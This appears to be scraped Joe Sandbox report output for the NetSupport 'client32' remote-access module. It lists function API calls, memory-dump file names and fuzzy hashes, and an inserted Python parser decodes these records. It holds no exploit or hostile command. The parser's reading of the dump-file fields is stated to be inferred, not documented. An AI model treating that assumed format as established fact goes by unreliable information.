• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Pixel$ReleaseSleepTime_memsettime
• String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
• API String ID: 686385934-1413253680
• Opcode ID: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
• Instruction ID: f16d89a374e4fe568ab7d55a1f425cdb876f14b981240f7c8f6700600d478685
• Opcode Fuzzy Hash: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
• Instruction Fuzzy Hash: 31419535E0161E9FEF15CFA4CD95BFEB7A5EB84309F10416DE916A7280EB34A90087A1
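The function records above (API calls with their `ref:` addresses, the `Memory Dump Source` list, the fuzzy hashes) are what an analyst pulls out of a Joe Sandbox report when building an import profile of the NetSupport `client32` module or when deciding which `.sdmp` dump to load into a disassembler. The following parser is an added example written for this page, not Joe Sandbox code and not part of the report. It takes the record text as shown here (a constructed sample assembled from the lines on this page), turns each API line into a structured call entry, and decodes the `.sdmp` file names. The file-name field layout is an assumption: the first two fields are read as the analysis process index and run (they match the `hcaresult_7_2_...` snapshot name on this page), the fourth as the region base address, the fifth as a Windows `PAGE_*` protection value and the seventh as a `MEM_*` region type. That reading is consistent with the dumps here (the code region at 0x11001000 carries 0x20 = `PAGE_EXECUTE_READ`, the header at 0x11000000 carries 0x02 = `PAGE_READONLY`, the data region at 0x111DD000 carries 0x04 = `PAGE_READWRITE`, and all carry 0x1000000 = `MEM_IMAGE`), but it is inferred from the values, not documented by the report. The remaining two fields are left undecoded.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from the function records on this page
# (the Sleep/GetDC/GetPixel/SetPixel/ReleaseDC function and one of the
# deque<T> helpers), trimmed to what the parser needs.
SAMPLE_RECORD = """\
APIs
  • Part of subcall function 1110B5F0: timeGetTime.WINMM ref: 1110B5FD
  • Part of subcall function 110F6220: GetACP.KERNEL32(0072B858,DBCS,Charset,932=*128), ref: 110F62AE
• Sleep.KERNEL32(00000032,?), ref: 1103B642
• GetDC.USER32(00000000), ref: 1103B64A
• GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B657
• SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B663
• ReleaseDC.USER32(00000000,00000000), ref: 1103B66C
• std::exception::exception.LIBCMT ref: 111251AE
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
"""

# One API line: optional "Part of subcall function <addr>:" prefix,
# then <api>.<MODULE>, optional "(args)", then "ref: <addr>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Dump file name. Field meanings are an assumption (see lead-in); f6 and f8
# are kept raw because nothing on the page says what they are.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp"
)

# Windows memory protection constants (winnt.h) and region types.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def decode_protect(value):
    base = PAGE_PROTECT.get(value & 0xFF, f"UNKNOWN(0x{value & 0xFF:X})")
    mods = [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join([base] + mods)


def parse_sdmp_name(text):
    """Find a .sdmp name in a line (ignores 'Download File' link residue) and decode it."""
    m = SDMP_RE.search(text)
    if not m:
        raise ValueError(f"no .sdmp name in {text!r}")
    protect = int(m["protect"], 16)
    return {
        "process": int(m["proc"], 16), "run": int(m["run"], 16), "seq": int(m["seq"]),
        "base": int(m["base"], 16), "protect": decode_protect(protect),
        "executable": bool(protect & 0xF0),  # any PAGE_EXECUTE* variant
        "type": MEM_TYPE.get(int(m["type"], 16), f"0x{m['type']}"),
        "f6": m["f6"], "f8": m["f8"],
    }


def parse_record(text):
    apis, associated, source = [], [], None
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            apis.append({
                "api": m["api"], "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": int(m["ref"], 16),
                "subcall_of": int(m["caller"], 16) if m["caller"] else None,
            })
        elif "Source File:" in line:
            source = parse_sdmp_name(line)
        elif "Associated:" in line:
            associated.append(parse_sdmp_name(line))
    return {"apis": apis, "source": source, "associated": associated}


def direct_sequence(record):
    """API names the function calls itself (not via subcalls), in address order."""
    direct = (a for a in record["apis"] if a["subcall_of"] is None)
    return [a["api"] for a in sorted(direct, key=lambda a: a["ref"])]


def modules_profile(record):
    """Module -> sorted API names, the shape used to compare against a known-good build."""
    prof = defaultdict(set)
    for a in record["apis"]:
        prof[a["module"]].add(a["api"])
    return {mod: sorted(names) for mod, names in prof.items()}


if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    print(direct_sequence(rec))
    print(modules_profile(rec))
    print(rec["source"])
```

`direct_sequence` reproduces the GetDC/GetPixel/SetPixel/ReleaseDC order from the record, and `parse_sdmp_name` tells you which dump is the executable image region (the one worth loading at `Offset: 11000000`) without opening each file.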
APIs
• GetMenuItemCount.USER32(?), ref: 110051CE
• _memset.LIBCMT ref: 110051F0
• GetMenuItemID.USER32(?,00000000), ref: 11005204
• CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
• EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
• GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 2755257978-4108050209
                                                                                                                                                                                                    • Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
• std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
• std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
• __CxxThrowException@8.LIBCMT ref: 1100F3B2
• std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
• std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
• String ID: bad cast$*r
• API String ID: 2427920155-3873134974
• Opcode ID: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
• Instruction ID: d39dcf25abbe8801d5c0a0784b2024497f923947b746a9a7221ebbb3b7ea5b8b
• Opcode Fuzzy Hash: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
• Instruction Fuzzy Hash: 6F31BF75D042659FDB55DF98C880BAEF7B4EB053B8F40826DD822A7290DB31B904DB92
APIs
• _memset.LIBCMT ref: 1101D440
• GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D45A
• _memset.LIBCMT ref: 1101D46A
• RegisterClassExA.USER32(?), ref: 1101D4AB
• CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11190240,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D4DE
• GetWindowRect.USER32(00000000,?), ref: 1101D4EB
• DestroyWindow.USER32(00000000), ref: 1101D4F2
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Class_memset$CreateDestroyInfoRectRegister
• String ID: NSMChatSizeWnd
• API String ID: 2883038198-4119039562
• Opcode ID: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
• Instruction ID: dcbcbcf091995d4067a9012f4e3e9d0ed9d195d12c757acb72af4b7ecf5f03b9
• Opcode Fuzzy Hash: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
• Instruction Fuzzy Hash: D63180B5D0121DAFCB10DFA5DDC4AEEFBB8EB48318F20456EF925A3240D73569018B61
APIs
• _strncmp.LIBCMT ref: 110094EA
• _strncmp.LIBCMT ref: 110094FA
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,24DE4E77), ref: 1100959B
Strings
• IsA(), xrefs: 11009555, 1100957D
• <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009521
• https://, xrefs: 110094DF
• http://, xrefs: 110094E5, 110094F8
• e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009550, 11009578
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strncmp$FileWrite
                                                                                                                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                                                    • API String ID: 1635020204-3154135529
                                                                                                                                                                                                    • Opcode ID: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction ID: d20e6e8e82cea177770e9d14c68faf5d1120bac870e30f80c07a18668992f196
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71315C75E0065AABDB00DF95DC84FDEB7B8EF49658F004259E825A7280EB35A604CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT(?,000000FF,00000024,?,?,687F6A18,?), ref: 687F6A3D
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6A78
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6B35
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6B8E
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6BAB
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 687F6BCE
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687F6A18,?), ref: 68809D32
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,687F6A18,?), ref: 68809D3C
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?,687F6A18,?), ref: 68809D56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1299486453-0
                                                                                                                                                                                                    • Opcode ID: c745a1876d2c15af52cc1aae0b91f04d690f4a01e189362dc6cc83279d0754fb
                                                                                                                                                                                                    • Instruction ID: d956d6fa85e74892b3bdbbf10e9491fd08cf018a68a0a49861b44b700794ba3d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c745a1876d2c15af52cc1aae0b91f04d690f4a01e189362dc6cc83279d0754fb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92614775A40309EFD7049F6DCC44BAA77B6EF84328FA0853DFA219B2D2D7759A018B50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy_s.MSVCR100(?,?,?,?), ref: 687F2B77
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68808C29
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68808C34
                                                                                                                                                                                                    • _memset.LIBCMT(?,00000000,?), ref: 68808C47
                                                                                                                                                                                                    • _fileno.MSVCR100(?,?,?), ref: 68808CA3
                                                                                                                                                                                                    • _read.MSVCR100(00000000,?,?), ref: 68808CAA
                                                                                                                                                                                                    • _memset.LIBCMT(?,00000000,000000FF), ref: 68808CD4
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68808CDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4008029522-0
                                                                                                                                                                                                    • Opcode ID: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                                                                                                                    • Instruction ID: b3e8c769893623e4796cd9570f087f588df294a777f087470a7b5f92883f2077
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9533a4b58b6482e30dfef67ed36a6f0b5c1fcf0c731f807410a20d3b90c6e9c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B51D630A51609DBDB108FAECE4469DB7B1AF45324F948A3AE834572D0D730D996CB72
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 602542589-0
                                                                                                                                                                                                    • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
